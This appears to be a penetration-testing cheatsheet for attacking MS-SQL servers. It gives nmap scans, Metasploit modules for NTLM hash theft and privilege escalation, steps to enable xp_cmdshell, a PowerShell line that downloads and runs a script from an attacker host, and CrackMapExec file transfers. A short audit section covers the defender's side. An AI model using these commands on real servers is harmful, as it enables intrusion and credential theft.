# MS-SQL - port 1433

## Scan

```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
```

## Metasploit modules

{% hint style="warning" %}
Warning: these modules require valid credentials.
{% endhint %}

```bash
# NTLM hash theft
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer # Steal the NTLM hash; start Responder before running it

# Information gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_idf

# Privilege escalation
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as # If the user holds the IMPERSONATE privilege, this tries to escalate
msf> use admin/mssql/mssql_escalate_dbowner # Escalate from db_owner to sysadmin

# Code execution
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload

# Add a new administrator from a meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
```

## Connecting

### From a Linux machine

```bash
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
```

### From a Windows machine

Download SSMS (*SQL Server Management Studio*):

<https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms>

{% hint style="info" %}
More convenient (graphical interface).
{% endhint %}

## Reading files on the server

```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```

## Code execution

{% hint style="info" %}
To execute OS commands through MSSQL, xp\_cmdshell must be enabled. If it is not, it can be enabled with sufficient privileges (sysadmin, or ALTER SETTINGS on the server).
{% endhint %}

### Check

```sql
> xp_cmdshell 'whoami';
> go
```

### Enable xp\_cmdshell

```sql
> EXEC sp_configure 'xp_cmdshell', 1;
> reconfigure;
> go

> xp_cmdshell 'whoami';
> go
```

### Force enabling (advanced options hidden)

```sql
> EXEC sp_configure 'show advanced options', 1;
> reconfigure;
> go

> EXEC sp_configure 'xp_cmdshell', 1;
> reconfigure;
> go

> xp_cmdshell 'whoami';
> go
```
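Defender-side counterpart to the two steps above: a T-SQL audit that shows whether the instance currently exposes these options, who could flip them (or read files via `OPENROWSET(BULK ...)`), and how to revert the change. This is an added example, not part of the original cheatsheet, and it assumes a login with sysadmin rights so that `sys.server_permissions` is fully visible.

```sql
-- Added audit example (not from the original page). Run as sysadmin.
-- 1. Current state of the options changed above. sys.configurations lists
--    advanced options even while 'show advanced options' is 0.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell')
ORDER BY name;

-- 2. Logins that can enable xp_cmdshell (sysadmin, CONTROL SERVER or
--    ALTER SETTINGS) or read server files through OPENROWSET(BULK ...)
--    (ADMINISTER BULK OPERATIONS).
SELECT pr.name, pr.type_desc, pe.permission_name, pe.state_desc
FROM sys.server_principals AS pr
JOIN sys.server_permissions AS pe
  ON pe.grantee_principal_id = pr.principal_id
WHERE pe.permission_name IN ('CONTROL SERVER', 'ALTER SETTINGS',
                             'ADMINISTER BULK OPERATIONS');

-- 3. Members of the fixed server role sysadmin.
SELECT m.name AS member, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 4. Revert: xp_cmdshell can only be addressed by sp_configure while advanced
--    options are shown, so disable it first, then hide the options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

After step 4, query 1 should show `value_in_use = 0` for both rows; an unexpected `1` on a production instance, or a non-admin login appearing in query 2, is worth an incident ticket.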

### File download

Double quotes are identifiers in T-SQL (`QUOTED_IDENTIFIER ON` by default), so the command string must use single quotes, with the inner quotes doubled:

```sql
> xp_cmdshell 'powershell.exe -exec bypass iex(new-object net.webclient).downloadstring(''http://<your ip>:<port>/script.ps1'')';
> go
```

#### With CrackMapExec

```bash
# Download
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path

# Upload
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt
```
